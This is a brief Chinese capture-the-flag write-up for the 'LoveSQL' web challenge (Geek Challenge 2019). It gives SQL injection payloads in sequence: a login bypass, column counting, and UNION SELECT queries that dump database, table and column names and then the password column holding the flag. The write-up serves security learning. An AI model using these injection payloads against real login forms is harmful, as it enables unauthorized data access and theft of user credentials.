极客大挑战 2019 lovesql wp

启动环境
极客大挑战 2019 lovesql wp_第1张图片
输入1 1尝试登录
在源码处显示
极客大挑战 2019 lovesql wp_第2张图片
尝试万能密码
username=1&password='or 1='1 %23
得到
极客大挑战 2019 lovesql wp_第3张图片
order by一下
发现4的时候报错
极客大挑战 2019 lovesql wp_第4张图片
爆数据库
username=1&password='union select 1,2,database()
极客大挑战 2019 lovesql wp_第5张图片
得到数据库名:geek
爆表名
username=1&password='union select 1,2,group_concat(table_name) from information_schema.tables where table_schema = ‘geek’%23
极客大挑战 2019 lovesql wp_第6张图片
两张表 geekuser 10velysql
爆字段
username=1&password='union select 1,2,group_concat(column_name) from information_schema.columns where table_schema = ‘geek’%23
在这里插入图片描述
先看第二张表吧
username=1&password='union select 1,2,group_concat(password) from l0ve1ysq1 %23
直接拿到flag
极客大挑战 2019 lovesql wp_第7张图片

你可能感兴趣的:(CTF-WEB,数据库,sql,网络安全)